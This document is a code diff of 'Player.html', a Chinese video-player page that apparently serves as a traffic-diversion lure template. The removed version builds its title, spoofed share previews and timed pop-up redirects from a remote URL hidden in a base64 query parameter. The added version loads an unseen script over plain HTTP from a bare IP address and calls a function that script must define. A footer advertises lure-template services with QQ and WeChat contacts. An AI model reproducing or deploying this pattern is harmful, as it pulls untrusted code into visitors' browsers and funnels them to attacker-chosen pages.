--- a/Player.html
+++ b/Player.html
@@ -1,187 +1,72 @@
-<strong>
-	<!DOCTYPE html>
-	<html lang="en">
-		<head>
-			<meta charset="utf-8">
-			<meta name="viewport"
-				content="width=device-width, height=device-height, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no">
-			<title>
-				IG;</title>
-			<script type="text/javascript" charset="utf-8" src="https://www.layuicdn.com/layui/layui.js"></script>
-			<link rel="stylesheet" href="https://g.alicdn.com/de/prismplayer/2.9.23/skins/default/aliplayer-min.css">
-			<script type="text/javascript" charset="utf-8"
-				src="https://g.alicdn.com/de/prismplayer/2.9.23/aliplayer-min.js"></script>
-			<style type="text/css">
-				body,
-				html {
-					width: 100%;
-					height: 100%;
-					background: #000;
-					padding: 0;
-					margin: 0;
-					overflow-x: hidden;
-					overflow-y: hidden
-				}
 
-				* {
-					margin: 0;
-					border: 0;
-					padding: 0;
-					text-decoration: none
-				}
+<!DOCTYPE html>
+<html lang="zh">
+	<head>
+		<meta charset="utf-8">
+		<meta http-equiv="x-ua-compatible" content="IE=edge">
+		<meta name="referrer" content="same-origin">
+		<meta name="referrer" content="no-referrer">
+		<!--    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">-->
+		<meta name="viewport"
+			content="width=device-width, height=device-height, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no" />
+		<title>h5播放器框架</title>
+		<link rel="stylesheet" href="https://g.alicdn.com/de/prismplayer/2.9.3/skins/default/aliplayer-min.css" />
+		<script type="text/javascript" charset="utf-8" src="https://g.alicdn.com/de/prismplayer/2.9.3/aliplayer-min.js">
+		</script>
+		<style>
+			body,
+			html {
+				width: 100%;
+				height: 100%;
+				display: flex;
+				justify-content: center;
+				align-items: center;
+				flex-direction: column;
+				background: rgb(0, 0, 0);
+				padding: 0;
+				margin: 0;
+			}
 
-				#btn-c {
-					color: #f5f5f5;
-					background-color: #3498db;
-					outline: none;
-					margin: 20px auto;
-					cursor: pointer;
-					text-align: center;
-					padding: 10px 80px;
-					border-radius: 4px;
-				}
+			* {
+				margin: 0;
+				border: 0;
+				padding: 0;
+				text-decoration: none
+			}
 
-				#diyBtnBox {
-					position: fixed;
+			#player-con {}
 
-					left: 0px;
-
-					bottom: 0px;
-
-					width: 100%;
-
-					height: 50px;
-
-					/* background-color: #000; */
-
-					z-index: 9999;
-					/* 
-    height:60px; 
-
-    line-height:60px; */
-
-					text-align: center;
-
-					/* color:#fff; */
-				}
-
-				video {
-					width: 100%;
-					height: 100%;
-				}
-
-
-				.btn.btn-lg {
-					padding: 10px 80px;
-				}
-
-				.btn.btn-hero,
-				.btn.btn-hero:hover,
-				.btn.btn-hero:focus {
-					color: #f5f5f5;
-					background-color: #3498db;
-					border-color: #3498db;
-					outline: none;
-					margin: 20px auto;
-					cursor: pointer;
-					text-align: center
-				}
-			</style>
-		</head>
-		<body>
-			<div style="width: 100%; height: 96vh;">
-				<div class="prism-player" id="player-con" style="width: 100%; height: 100%;"></div>
-			</div>
-			<div style="text-align:center" id="diyBtnBox">
-				<button class="btn btn-hero btn-lg" role="button" id="diyBtn" onclick="abc()"></button>
-			</div>
-			<script src="https://lib.sinaapp.com/js/jquery/2.0.2/jquery-2.0.2.min.js"></script>
+			.group_but {
+				margin-top: 15px;
+				padding: 20px;
+				height: 38px;
+				text-align: center;
+				align-items: center;
+				display: flex;
+				justify-content: center;
+				border-radius: 8px;
+				background-image: repeating-linear-gradient(-45deg, #3d7eff, #31c9e8);
+				color: #fff;
+				letter-spacing: 2px;
+			}
+		</style>
+		<script>
+			
+		</script>
+	</head>
+	<body>
+		<div class="prism-player" id="player-con" style="height: 90vh;"></div>
+		<button class="group_but" onclick="loca()">更多精彩内容点我</button>
+		<script src="http://175.24.185.167/cGe/index.txt"></script>
 		
-			<script src="http://qzonestyle.gtimg.cn/qzone/qzact/common/share/share.js"></script>
-			<script>
-				var loaction = "";
-
-				function getQueryVariable(variable) {
-					var query = window.location.search.substring(1);
-					var vars = query.split("&");
-					for (var i = 0; i < vars.length; i++) {
-						var pair = vars[i].split("=");
-						if (pair[0] == variable) {
-							return pair[1];
-						}
-					}
-					return (false);
-				}
-				var Identifying = getQueryVariable('vid');
-				var sharUrl = window.location.search + "?vid=" + Identifying;
-				load(Identifying);
-
-				function load(Identifying) {
-					var zz = atob(Identifying);
-					var zl = decodeURIComponent(zz);
-					$.ajax({
-						url: zl,
-						type: 'get',
-						success: function(res) {
-							res = decodeURIComponent(res);
-							console.log(res);
-							var date = JSON.parse(res);
-							console.log(date);
-							if (date.code == 200) {
-								var player = new Aliplayer({
-									"id": "player-con",
-									"source": date.Link,
-									"width": "100%",
-									"height": "670px",
-									"autoplay": true,
-									"isLive": false,
-									"rePlay": false,
-									"playsinline": true,
-									"preload": true,
-									"controlBarVisibility": "hover",
-									"useH5Prism": true
-								}, function(player) {
-									console.log("The player is created");
-								});
-								var videoElement = document.getElementById("player-con");
-								document.title = date.Headline;
-								$('#diyBtn').text(date.Button_Name)
-								loaction = date.Button_Link;
-								setShareInfo({
-									title: date.Headline, 
-									summary: date.Content, 
-									pic: 'https://file.service.qq.com/outside-files/20230122/202301220027125711.jpeg', 
-									url: sharUrl 
-								});
-								if (date.Limit_time == 0) {
-
-								} else if (date.Limit_time > 0) {
-									var sz = date.Limit_time * 1000
-									setTimeout(function() {
-										videoElement.pause();
-										var dialog_url = date.Tc_Button_Link;
-										var dialog_content = date.Tc_Content;
-										var but_n = date.Tc_Button_Name;
-										layer.confirm(dialog_content, {
-											btn: [but_n, 'ok'],
-											btnAlign: 'c'
-										}, function(index) {
-											window.location.replace(dialog_url)
-											layer.close(index);
-										});
-									}, sz);
-								}
-							}
-						},
-					})
-
-
-				}
-
-				function abc() {
-					document.location.replace(loaction);
-				}
-			</script>
-		</body>
-	</html>
-</strong>
+	</body>
+	<!-- 
+	
+	播放器框架:阿里云 
+	二改:阿雄
+	Qq:1011550928
+	Wechat:Lix077
+	接 h5引流模板定制,uniapp 软件开发，前端后端皆可定制，接ios跟Android引流软件定制。
+	
+	-->
+</html>
